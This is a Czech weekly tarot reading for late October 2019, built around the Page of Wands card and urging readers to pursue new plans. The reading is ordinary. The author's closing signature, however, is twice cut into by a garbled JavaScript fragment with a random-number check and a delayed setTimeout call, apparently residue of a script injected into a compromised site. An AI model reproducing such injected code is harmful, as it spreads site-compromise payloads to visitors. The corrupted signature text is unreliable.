Ezoterika, Magie,  Tarot

Týdenní čtení z tarotových karet: 28. října – 3. listopadu 2019

Karta týdne: Páže holí

Toto bude skvělý týden na započetí realizace vašich nových, případně i prachem zapadlých nápadů, plánů nebo cílů. Bez ohledu na váš věk nebo vzdělání! (jedna moje klientka si splnila svůj dětský sen a v 73 letech si otevřela taneční studio, vede jej již 10 roků s radostí a dokonce velice úspěšně! A 7letá dcerka mé další klientky si s její pomocí otevřela malinkatý e-shop s originálními korálky z novin!) V tuto dobu nebude pro nikoho ani příliš brzdy, ani příliš pozdě! Poslední říjnové a první listopadové dny vám poskytnou ideální příležitost pro nový začátek!
Možná byste si dokonce měli vyhradit každý den tohoto týdne nějaký ten čas na přemýšlení o tom, jak byste mohli své sny nebo i touhy uskutečnit. A měli byste snít „velké sny“! Ptejte se sami sebe, jak můžete oživit své staré až praprastaré nápady a cíle. Možná však budete muset přehodnotit či „zmapovat“ své dosavadní „strategie“ a postupy, anebo podrobit zkoumání a testům své nápady, či několika experimenty vyzkoušet jejich aktuálnost, schopnost přinést vám úspěch, případně jejich užitečnost jak pro vás, tak pro jiné. Může být skutečně užitečné „profiltrovat“ vaše ideje, abyste pak zvolili pouze ty, které jsou v souladu s vašimi vyššími, dlouhodoběji udržitelnými, zdárnějšími cíli.

Výzva Pážete holí na tento týden:
Buďte hodně, hodně zvídaví a uvidíte, kam až vás může vaše inspirace přivést. I když vyjde najevo, že je to něco úplně nového, a nikoli to, na co jste se chtěli zaměřit, mějte otevřenou mysl a jděte vedeni svou zvědavostí stále vpřed. Projevíte-li svobodného ducha, váš potenciál se ukáže být téměř neomezený. Tento týden a Páže holí má pro vás dar: budete-li skutečně a velmi chtít, a nebude vám „smrdět“ žádná práce, úsilí a snaha, dokážete najít růst a potenciál na těch nejméně pravděpodobných místech. Nenechte si nikým, ničím a v ničem omezovat, nic nebude v těchto sedmi dnech bez naděje na úspěch. Ať už půjde o vaše sny, vztahy, práci, bydlení, děti, rodiče atd.

Judita Katona Peschlová, zkušená kartářka, psychoterapeutka, terapeutka andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andělské terapie a lektorka rodinných konstelací, žurnalistka a spisovatelka; www.angelcity.cz, judita.andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andele@gmail.com